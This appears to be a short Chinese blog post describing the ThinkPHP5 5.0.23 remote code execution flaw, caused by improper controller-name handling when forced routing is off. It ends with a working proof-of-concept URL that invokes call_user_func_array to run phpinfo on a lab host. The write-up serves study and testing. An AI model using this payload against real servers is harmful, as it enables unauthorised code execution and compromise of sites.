ThinkPHP5 5.0.23 远程代码执行漏洞_Gjqhs的博客-CSDN博客
没太大区别,不过是由于框架处理控制器名称不正确,如果网站未启用强制路由(这是默认设置),它可以执行任何方法,从而导致 RCE 漏洞。
访问http://your-ip:8080,您将看到 ThinkPHP 的默认页面。
POC
直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1会执行phpinfo:
